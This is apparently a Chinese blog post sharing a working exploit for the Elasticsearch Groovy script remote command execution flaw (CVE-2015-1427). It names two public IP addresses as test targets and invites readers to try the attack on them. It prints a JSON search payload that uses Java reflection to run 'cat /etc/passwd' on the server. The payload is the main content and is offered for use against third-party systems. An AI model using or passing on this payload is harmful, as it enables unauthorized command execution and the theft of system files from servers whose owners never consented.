Elasticsearch Groovy任意命令执行漏洞EXP

  • A+
所属分类:漏洞分享

感谢:@lupin 的分析(Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)) 
本exp不一定正确,测试的站太少了,大家去测试测试。 
测试url:http://190.196.67.252:9200/_search?pretty 
http://191.234.18.14:9200///_search?pretty 


{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

Elasticsearch Groovy任意命令执行漏洞EXP

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: